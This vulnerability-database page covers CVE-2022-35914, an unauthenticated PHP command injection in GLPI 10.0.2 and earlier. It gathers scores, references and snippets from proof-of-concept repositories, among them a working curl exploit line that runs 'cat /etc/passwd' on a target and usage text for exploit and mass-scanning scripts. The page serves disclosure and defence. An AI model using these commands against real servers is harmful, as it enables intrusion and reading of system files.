Published: 19/09/2022 Updated: 28/10/2022

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 0

/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI up to and including 10.0.2 allows PHP code injection.

Vulnerable Product	Search on Vulmon	Subscribe to Product
glpi-project glpi

This Metasploit module exploits an unauthenticated PHP command injection vulnerability in GLPI versions 1002 and below to execute a command ...

Unauthenticated RCE in GLPI 10.0.2

CVE-2022-35914 Unauthenticated RCE in GLPI 1002 PoC curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' {{HOST}}/vendor/htmlawed/htmlawed/htmLawedTestphp |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (*)<br \/>/\1/'

Some nuclei poc for my own use. 一些自用的Nuclei POC

myown-nuclei-poc Some nuclei poc for my own use 一些自用的Nuclei POC 在开始使用之前，请务必阅读并同意免责声明中的条款，否则请勿下载安装使用本项目中的所有文件 ⚡️漏洞清单 2022-10-06 [add]GLPI远程RCE漏洞-CVE-2022-35914 2022-10-05 [add] 泛微E-office 10 文件上传getshell漏洞 2022-09-10 [add] 用友nc beanshel

CVE-2022-35914

CVE-2022-35914 PoC References githubcom/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr Usage pip install -r requirementstxt /CVE-2022-35914py -h usage: CVE-2022-35914py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT] CVE-2022-35914 - GLPI - Command injection using a third-party library script op

CVE-2022-35914

CVE-2022-35914 PoC References githubcom/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr Usage pip install -r requirementstxt /CVE-2022-35914py -h usage: CVE-2022-35914py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT] CVE-2022-35914 - GLPI - Command injection using a third-party library script op

CVE-2022-35914批量检测工具创建targettxt文件把要检测的url导入进去然后就可以开始批量检测若出现错误请关闭代理 <！！！免责声明本工具仅供授权下使用，禁止使用该项目进行违法操作，否则后果自负！！！>

Lord Of Active Directory - automatic vulnerable active directory on AWS

Intro Based on AWS-Redteam-Lab and OCD GOAD The price for running the lab for 125 hours during one month is approximately 14$ With Free Tier you get 750h of EC2 per month, there is 6 machines so 125h But you only get 30Gb of storage So you need storage for the other 5 VMs : 30Gb * 5 = 150Gb = 14$ / month Installation Just like the GOAD project, the installation is in two par

RedTeam Fundamentals Linux Linux Fundamentals academyhacktheboxcom/course/preview/linux-fundamentals Introduction to Networking academyhacktheboxcom/course/preview/introduction-to-networking Intro to Network Traffic Analysis academyhacktheboxcom/module/details/81 MacOS Fundamentals academyhacktheboxcom/module/details/157 Windo

CWE-74 http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed https://github.com/glpi-project/glpi/releases https://glpi-project.org/fr/glpi-10-0-3-disponible/http://packetstormsecurity.com/files/169501/GLPI-10.0.2-Command-Injection.html https://nvd.nist.gov https://packetstormsecurity.com/files/169501/GLPI-10.0.2-Command-Injection.html https://github.com/Gabriel-Lima232/CVE-2022-35914

CVE-2022-35914

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect